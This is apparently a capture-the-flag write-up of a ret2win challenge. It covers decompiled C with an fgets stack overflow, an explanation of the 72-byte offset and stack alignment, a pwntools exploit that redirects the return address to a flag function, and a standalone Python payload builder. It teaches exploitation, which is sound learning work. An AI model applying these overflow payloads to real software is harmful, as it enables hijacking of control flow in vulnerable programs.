Here is the decompiled code for the challenge.
#include <stdio.h>
#include <string.h>

int main(void)
{
    int iVar1;
    char input [64];                     /* 64-byte stack buffer */
    printf("What is the password?\n?: ");
    fflush(stdout);
    fgets(input,0x80,stdin);             /* reads up to 0x7f bytes into a 64-byte buffer: stack overflow */
    iVar1 = strcmp(input,"password\n");  /* fgets keeps the newline, hence the "\n" in the comparison */
    if (iVar1 != 0) {
        puts("incorrect password");
        fflush(stdout);
    }
    return 0;                            /* the ret here pops the (possibly overwritten) return address */
}
fgets reads up to 0x80 - 1 = 127 bytes into a buffer that is only 64 bytes long, so there is a pretty large stack buffer overflow on the input variable (about 63 bytes past its end, enough to reach the saved return address). The password check itself is a decoy: fgets keeps the trailing newline, which is why the comparison is against "password\n", but even the correct password only suppresses the "incorrect password" message. main never calls the flag function, so the flag is only reachable by corrupting control flow. Conveniently the binary contains a function called flag that prints the flag, and all protections are disabled (no stack canary to trip on the way past the frame, and no PIE, so flag has a fixed address that can be taken straight from the symbol table).

This is a classic ret2win scenario: overwrite the saved return address of main so that the ret at the end of main jumps to flag. On x86-64 the saved return address sits just above the 64-byte buffer and the 8-byte saved rbp, which gives an offset of 64 + 8 = 72 bytes; it is worth confirming this in a debugger with a cyclic pattern, since the decompiler's view of the frame does not always match the real stack layout. Two things to keep in mind with fgets as the input primitive: the whole payload (72 bytes of padding plus an 8-byte address) must stay under the 127-byte limit, and no byte of the packed address may be 0x0a, because fgets stops reading at a newline. If flag crashes before printing anything (typically inside printf or puts), the usual cause on x86-64 is the 16-byte stack alignment that the extra return breaks; returning to a lone ret gadget first and then to flag fixes that.
A small Python script using pwntools does the job. start() and elf come from the standard pwntools exploit template (pwn template); here they are spelled out, with a placeholder binary name, so the script runs on its own:

from pwn import *

elf = context.binary = ELF('./challenge')   # placeholder name: use the challenge binary (also makes pack() 64-bit)

def start():
    return process(elf.path)

io = start()
payload = flat(
    b'A'*(64+8),              # 64-byte buffer + 8-byte saved rbp
    pack(elf.symbols.flag))   # saved return address -> flag()
write("payload", payload)     # keep a copy on disk for testing under gdb
io.sendlineafter(b'?: ', payload)
io.interactive()
I didn't save the flag, but this works and solves the challenge.
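As an added example (not from the original writeup), here is a pwntools-free script that shows where the 64+8 comes from and how the payload is laid out. It generates a cyclic (de Bruijn) pattern like pwntools' cyclic(), models the vulnerable frame as [64-byte buffer][saved rbp][saved rip] to see which pattern bytes land in the return-address slot (on the real target that value is read from gdb at the crashing ret), recovers the offset with the equivalent of cyclic_find(), and then packs the payload with struct, refusing addresses that contain 0x0a. The frame layout and the flag address 0x401196 are assumptions for illustration, not values from the challenge binary.

```python
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"   # no 0x0a byte, so fgets never stops early


def cyclic(length, alphabet=ALPHABET, n=4):
    """Return `length` bytes of a de Bruijn sequence in which every n-byte
    window is unique (the same construction pwntools' cyclic() uses)."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def db(t, p):
        if len(out) >= length:          # enough output: unwind
            return
        if t > n:
            if n % p == 0:
                out.extend(alphabet[a[j]] for j in range(1, p + 1))
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(out[:length])


def cyclic_find(subseq, max_len=4096):
    """Offset of the 4-byte window `subseq` inside the pattern, -1 if absent
    (equivalent to pwntools' cyclic_find() for patterns up to max_len)."""
    return cyclic(max_len).find(bytes(subseq[:4]))


def simulate_overflow(data, buf_size=64, saved_rbp=8):
    """Model of the vulnerable frame: [input buffer][saved rbp][saved rip].
    Returns the 8 bytes that fgets(input, 0x80, stdin) leaves in the saved-rip
    slot. This layout is an assumption; on the real target read it from gdb."""
    ret_slot = buf_size + saved_rbp
    return data[ret_slot:ret_slot + 8]


def find_offset(fgets_limit=0x80):
    """Feed a cyclic pattern of maximal length and recover the padding needed
    to reach the saved return address."""
    pattern = cyclic(fgets_limit - 1)   # fgets reads at most limit-1 bytes
    crash_rip = simulate_overflow(pattern)
    return cyclic_find(crash_rip)


FLAG_ADDR = 0x401196   # placeholder for elf.symbols.flag (not the challenge's value)


def address_is_safe(addr):
    """fgets stops at a newline, so a packed address containing 0x0a would be
    truncated before it reaches the return-address slot."""
    return b"\n" not in struct.pack("<Q", addr)


def build_payload(flag_addr=FLAG_ADDR, offset=72, fgets_limit=0x80):
    """Padding up to the saved rip, then the little-endian target address
    (what flat(b'A'*72, pack(addr)) produces with a 64-bit context.binary)."""
    if not address_is_safe(flag_addr):
        raise ValueError("target address contains 0x0a; pick another entry point")
    payload = b"A" * offset + struct.pack("<Q", flag_addr)
    if len(payload) >= fgets_limit:
        raise ValueError("payload does not fit in the fgets read")
    return payload


if __name__ == "__main__":
    print("offset:", find_offset())
    print("payload:", build_payload().hex())
```

On a live target the only step that changes is simulate_overflow: send cyclic(127) to the program under gdb, take the 8 bytes at the top of the stack when the ret faults, and pass them to cyclic_find.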